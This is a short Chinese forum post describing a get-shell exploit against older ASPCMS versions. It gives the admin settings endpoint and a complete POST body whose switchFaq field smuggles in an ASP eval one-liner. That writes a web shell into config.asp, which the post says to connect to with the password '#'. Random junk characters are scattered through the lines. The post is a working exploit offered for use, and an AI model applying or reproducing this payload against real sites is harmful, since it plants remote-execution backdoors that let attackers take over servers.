老的ASPCMS版本的秒杀拿SHELL漏洞
) m. c$ a% V0 ~2 X/ {7 [5 l9 M& R3 l/ F% h% N
找到后台。。。然后
+ Y/ X' Z# v" c' ^! } / y" {: T- ]! e- G5 [; K, X
/admin/_system/AspCms_SiteSetting.asp?action=saves
4 d8 D7 \+ Y' ~. J$ H; D$ _ $ Y5 A9 F* w4 W' d- I; Y
直接POST8 O, g X0 T, m- w* z3 V" y
( e! ^, ^: Y9 ?' X
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1: o. O+ H3 H5 O0 J/ s
% p* F# N, |3 f2 o1 m% _4 g再连接配置文件config.asp 密码为#9 k) g$ Z' y+ H# M [
|